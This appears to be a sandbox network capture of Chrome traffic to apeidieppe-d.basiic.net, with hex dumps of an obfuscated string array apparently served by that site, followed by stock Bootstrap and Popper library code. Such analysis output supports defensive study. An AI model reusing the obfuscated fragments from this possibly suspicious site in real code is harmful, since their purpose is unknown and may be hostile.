                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 2b 4a 7b 27 2c 27 37 2f 29 3b 25 32 2a 54 39 24 4c 46 68 24 64 28 4a 52 7a 43 6d 31 54 7c 26 40 39 27 2c 27 3b 77 37 47 5e 5a 56 28 72 7d 23 4a 75 5f 64 60 26 49 3d 5d 4e 52 69 3c 66 73 4f 44 3f 70 6d 51 27 2c 27 75 59 5b 4d 30 32 29 38 51 2e 21 78 59 47 4b 7e 7d 53 25 69 35 3c 35 69 2a 3a 5e 3d 2a 7d 5e 37 6f 62 4c 4d 60 38 42 27 2c 27 38 46 47 74 30 76 3f 61 40 53 73 3c 73 70 7c 7e 4f 44 6d 5d 43 24 57 2f 7e 3d 4a 5a 42 2e 73 51 6e 4f 7e 5d 6f 76 63 63 78 75 2e 30 79 73 4e 27 2c 27 78 4f 3a 3e 2b 32 6c 3c 69 6c 4f 5a 46 4f 73 64 61 53 21 3b 49 7a 25 35 33 36 49 4d 6a 34 6a 37 55 49 62 70 46 3c 42 27 2c 27 7e 52 25 56 4f 79 70 65 3f 69 27 2c 27 74 73 42 3e 59 36 2b 54 24 69 23 56 26 50 21 61 27 2c 27 3c 74 62 47 35 32 3f 7d 7d 51 4d 60 22 71 27 2c 27 33
                                                                                                                  Data Ascii: +J{','7/);%2*T9$LFh$d(JRzCm1T|&@9',';w7G^ZV(r}#Ju_d`&I=]NRi<fsOD?pmQ','uY[M02)8Q.!xYGK~}S%i5<5i*:^=*}^7obLM`8B','8FGt0v?a@Ss<sp|~ODm]C$W/~=JZB.sQnO~]ovccxu.0ysN','xO:>+2l<ilOZFOsdaS!;Iz%536IMj4j7UIbpF<B','~R%VOype?i','tsB>Y6+T$i#V&P!a','<tbG52?}}QM`"q','3
                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 41 29 52 4a 4a 71 47 46 52 30 3e 56 3a 73 3f 61 74 27 2c 27 54 2e 65 33 58 5b 58 7d 54 26 24 2c 78 47 29 39 71 36 3c 4d 3b 4f 4c 60 21 3d 78 7c 2e 76 69 27 2c 27 31 6d 7e 3c 5d 4b 78 54 68 40 39 35 32 28 77 70 5b 2c 49 66 28 24 4f 65 65 27 2c 27 6e 4a 68 4a 23 6f 57 62 5f 26 3c 38 5b 6f 3b 37 23 22 48 27 2c 27 60 2f 36 59 73 73 22 54 3f 29 34 60 7b 73 50 58 59 44 5e 56 5d 28 7e 7b 5b 2c 7d 27 2c 27 32 49 53 5a 70 45 4d 30 52 75 54 30 38 24 54 27 2c 27 56 55 2a 5a 28 24 7a 58 62 32 75 4b 2f 2e 4e 27 2c 27 79 49 2b 5a 42 73 5f 7a 3d 61 32 5a 23 73 23 62 50 73 23 53 62 38 40 4d 46 6c 48 6b 6c 45 57 43 78 5f 48 27 2c 27 4b 34 36 74 4a 6f 2a 60 40 73 5e 4a 7b 27 2c 27 72 58 44 59 70 6f 26 37 3a 2f 53 5d 43 45 58 61 27 2c 27 3e 58 63 71 5a 29 56 38 54 26 27 2c
                                                                                                                  Data Ascii: A)RJJqGFR0>V:s?at','T.e3X[X}T&$,xG)9q6<M;OL`!=x|.vi','1m~<]KxTh@952(wp[,If($Oee','nJhJ#oWb_&<8[o;7#"H','`/6Yss"T?)4`{sPXYD^V](~{[,}','2ISZpEM0RuT08$T','VU*Z($zXb2uK/.N','yI+ZBs_z=a2Z#s#bPs#Sb8@MFlHklEWCx_H','K46tJo*`@s^J{','rXDYpo&7:/S]CEXa','>XcqZ)V8T&',
                                                                                                                  2024-10-22 14:08:34 UTC1369INData Raw: 40 46 47 32 7c 45 6d 55 49 38 41 28 2a 44 58 7b 2e 2e 29 2e 66 36 30 71 6e 72 6d 30 5a 43 69 31 69 25 4c 5e 7c 4e 6e 55 45 68 6e 58 57 25 58 39 5f 55 44 60 5f 32 39 58 53 5a 66 38 29 51 54 49 3d 52 34 35 28 37 6d 59 74 6b 56 28 2a 22 32 2f 29 72 4b 65 66 3a 64 3b 24 6a 43 71 3b 63 35 33 2e 21 34 25 7c 4a 51 68 74 46 74 41 4b 65 40 24 75 78 28 5a 48 66 7e 59 41 6d 5d 72 21 60 32 41 22 72 4e 46 44 3b 62 70 49 61 70 2f 66 3a 7a 3f 29 46 29 50 70 22 51 5b 30 23 5d 31 32 78 54 3e 32 3f 38 3a 4f 4a 30 37 2f 29 65 71 4b 23 7a 43 24 2f 4f 4a 47 23 50 66 4f 61 3e 7a 49 2e 46 54 61 5d 56 6e 67 4a 60 33 74 35 53 7e 79 48 5b 57 2f 69 6c 54 50 22 64 6c 3e 37 74 72 3c 64 2f 66 73 69 47 25 7c 74 76 3b 6e 46 3e 55 57 33 37 65 3b 29 7a 5a 48 3b 58 58 53 64 43 3b 36 61 7d
                                                                                                                  Data Ascii: @FG2|EmUI8A(*DX{..).f60qnrm0ZCi1i%L^|NnUEhnXW%X9_UD`_29XSZf8)QTI=R45(7mYtkV(*"2/)rKef:d;$jCq;c53.!4%|JQhtFtAKe@$ux(ZHf~YAm]r!`2A"rNFD;bpIap/f:z?)F)Pp"Q[0#]12xT>2?8:OJ07/)eqK#zC$/OJG#PfOa>zI.FTa]VngJ`3t5S~yH[W/ilTP"dl>7tr<d/fsiG%|tv;nF>UW37e;)zZH;XXSdC;6a}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.1649755104.18.11.2074432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:35 UTC691OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                  Host: maxcdn.bootstrapcdn.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:35 UTC953INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:35 GMT
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  CDN-PullZone: 252412
                                                                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                  CDN-RequestCountryCode: US
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=31919000
                                                                                                                  ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                  CDN-ProxyVer: 1.04
                                                                                                                  CDN-RequestPullSuccess: True
                                                                                                                  CDN-RequestPullCode: 200
                                                                                                                  CDN-CachedAt: 09/24/2024 09:00:40
                                                                                                                  CDN-EdgeStorageId: 1067
                                                                                                                  timing-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CDN-Status: 200
                                                                                                                  CDN-RequestTime: 0
                                                                                                                  CDN-RequestId: 6166e24cc72ffa31d965f71ad609aea7
                                                                                                                  CDN-Cache: HIT
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f6c2dd94602-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:35 UTC416INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                  Data Ascii: 7bfa/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69
                                                                                                                  Data Ascii: ","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c 65
                                                                                                                  Data Ascii: (n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"ele
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74
                                                                                                                  Data Ascii: CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65
                                                                                                                  Data Ascii: lass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43 54
                                                                                                                  Data Ascii: ,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={ACT
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54 45
                                                                                                                  Data Ascii: rval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_ITE
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42 79
                                                                                                                  Data Ascii: area/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemBy
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22 20
                                                                                                                  Data Ascii: atedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+"
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c 6c
                                                                                                                  Data Ascii: tion(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.coll


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.1649756104.17.24.144432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:35 UTC697OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:35 UTC959INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:35 GMT
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                  ETag: W/"5eb03fa9-4af4"
                                                                                                                  Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                  Timing-Allow-Origin: *
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 49555
                                                                                                                  Expires: Sun, 12 Oct 2025 14:08:35 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9l%2FOEvqE1xmiXshdIPASl1j77EPBPG2hkFqnCkjKPivLiw%2BaIkD7VvK8%2BK4jtm0FxKbRnE4v%2B8gyq7fpfic0SaZhiJPOyqBV28hYkCdqmPHh9WLXYaL2RkP5RBqWIIH3rZlcZDD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f6c2f54e7cf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:35 UTC410INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                  Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27
                                                                                                                  Data Ascii: e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document'
